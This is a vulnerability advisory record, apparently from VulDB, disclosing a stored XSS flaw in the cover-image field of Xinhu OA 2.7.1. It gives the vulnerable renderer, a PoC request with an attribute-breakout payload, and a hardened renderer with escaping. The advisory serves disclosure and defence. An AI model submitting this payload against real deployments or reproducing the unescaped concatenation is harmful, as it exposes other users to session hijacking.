| Title | Xinhu OA V2.7.1 (earlier versions may also be affected) Stored Cross-Site Scripting (XSS) |
|---|
| Description | Xinhu OA V2.7.1 is vulnerable to stored Cross-Site Scripting (XSS) in the "Notice and Announcement" (通知公告) module. The value submitted in the fengmian (cover image) parameter when a notice is saved is stored unchanged and later rendered by a column renderer in rock_page_gong.php, which concatenates it into an <img> tag without any validation or output encoding.
A user who can add a notice can therefore inject an XSS payload into it. When other users view the reminder information in the "Personal Center" (个人中心), the payload executes in their browser. This could lead to session hijacking, actions performed on the victim's behalf, or the execution of further malicious code.
Advisory / Exploit
Vulnerability Point: Notice and Announcement - Add New Notice
Trigger Point: Personal Center - Reminder Information - View
Vulnerable Code Snippet (rock_page_gong.php):
```javascript
c.setcolumns('fengmian', {
    renderer: function(v) {
        if (!v) return ' ';
        // The variable 'v' is directly concatenated into the HTML string
        return '<img src="' + v + '" height="60">';
    }
});
```
Proof of Concept (POC): An attacker can submit the following POST request with a malicious payload in the fengmian parameter:
```http
POST /index.php?a=save&m=mode_news|input&d=flow&ajaxbool=true&rnd=98122 HTTP/1.1
Host: [Target_Host]
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie:

id=0&sxuanfileid=151&title=test&fengmian="x onerror="alert(1)"&typename=Security&...
```
With this value the renderer emits `<img src=""x onerror="alert(1)"" height="60">`. The browser closes the src attribute at the injected quote, treats onerror as a separate attribute and fires it because the empty src cannot load; since the value is stored with the notice, the script runs for every user who views the reminder. The body above shows the value unencoded for readability; in a real application/x-www-form-urlencoded request it should be URL-encoded (`%22x%20onerror%3D%22alert(1)%22`).
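As an added example (not part of the submitted advisory and not RockOA's own code), the quoted renderer is reproduced as a function beside a hardened version, together with a small attribute tokenizer that mimics how a browser splits the emitted tag, so the attribute breakout can be checked offline. The function names, the scheme allow-list and the tokenizer are assumptions; the payload string is the decoded fengmian value from the PoC request.

```javascript
// Added example, not RockOA's own code: the fengmian renderer quoted from
// rock_page_gong.php, reproduced as a function, beside a hardened version, plus a
// small attribute tokenizer that mimics how a browser splits the emitted tag.
// Function names, the scheme allow-list and the tokenizer are assumptions.

// Vulnerable form: mirrors the quoted renderer. `v` is the stored cover value.
function renderCoverVulnerable(v) {
  if (!v) return ' ';
  return '<img src="' + v + '" height="60">';
}

// Escape the characters that can end or alter a double-quoted attribute.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Allow only http(s) URLs or relative paths for the image source (assumed policy).
function isAllowedImageUrl(v) {
  const s = String(v).trim();
  if (/^[a-z][a-z0-9+.-]*:/i.test(s)) return /^https?:/i.test(s); // has a scheme
  return !s.startsWith('//');                                       // no protocol-relative
}

// Hardened form: same markup, but the value is validated and attribute-encoded.
function renderCoverSafe(v) {
  if (!v || !isAllowedImageUrl(v)) return ' ';
  return '<img src="' + escapeAttr(v) + '" height="60">';
}

// Decode the entities escapeAttr produces (single pass, so &amp;quot; stays &quot;).
function decodeEntities(s) {
  const map = { quot: '"', amp: '&', lt: '<', gt: '>', '#39': "'" };
  return s.replace(/&(quot|amp|lt|gt|#39);/g, (_, e) => map[e]);
}

// Minimal attribute tokenizer (simplified from the HTML spec tokenizer states):
// returns the attribute map a browser would build for one start tag.
function parseTagAttributes(html) {
  const m = /^<([a-zA-Z][^\s\/>]*)/.exec(html);
  if (!m) return null;
  const attrs = Object.create(null);
  const n = html.length;
  let i = m[0].length;
  while (i < n) {
    while (i < n && /[\s\/]/.test(html[i])) i++;          // before attribute name
    if (i >= n || html[i] === '>') break;
    let name = '';
    if (html[i] === '=') name += html[i++];                  // stray '=' joins the name
    while (i < n && !/[\s\/>=]/.test(html[i])) name += html[i++];
    name = name.toLowerCase();
    while (i < n && /\s/.test(html[i])) i++;                 // after attribute name
    let value = '';
    if (i < n && html[i] === '=') {
      i++;
      while (i < n && /\s/.test(html[i])) i++;
      if (html[i] === '"' || html[i] === "'") {
        const q = html[i++];
        while (i < n && html[i] !== q) value += html[i++];
        i++;                                                 // closing quote
      } else {
        while (i < n && !/[\s>]/.test(html[i])) value += html[i++];
      }
    }
    if (!(name in attrs)) attrs[name] = decodeEntities(value); // first occurrence wins
  }
  return attrs;
}

// Constructed input: the fengmian value from the PoC request, decoded.
const POC_FENGMIAN = '"x onerror="alert(1)"';

// Stand-alone run: show what each renderer hands to the browser.
console.log(renderCoverVulnerable(POC_FENGMIAN), parseTagAttributes(renderCoverVulnerable(POC_FENGMIAN)));
console.log(renderCoverSafe(POC_FENGMIAN), parseTagAttributes(renderCoverSafe(POC_FENGMIAN)));
```

The tokenizer shows the vulnerable output splitting into `src=""`, a stray `x`, and `onerror="alert(1)"`, while the hardened output keeps the whole value inside `src` as data. The string-based fix is shown because the page's renderer returns markup; where the grid allows it, building the element with `document.createElement('img')` and assigning its `src` property avoids string assembly altogether.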
Company official website URL: http://www.rockoa.com/
Source code download address: http://www.rockoa.com/index.php?a=down&id=298 |
|---|
| User | BlackSpdier (UID 89912) |
|---|
| Submitted | 2025-12-28 11:05 AM (4 months ago) |
|---|
| Moderation | 2026-01-04 06:56 PM (7 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 339493 [Xinhu Rainrock RockOA up to 2.7.1 Cover Image rock_page_gong.php fengmian Cross Site Scripting] |
|---|
| Points | 17 |
|---|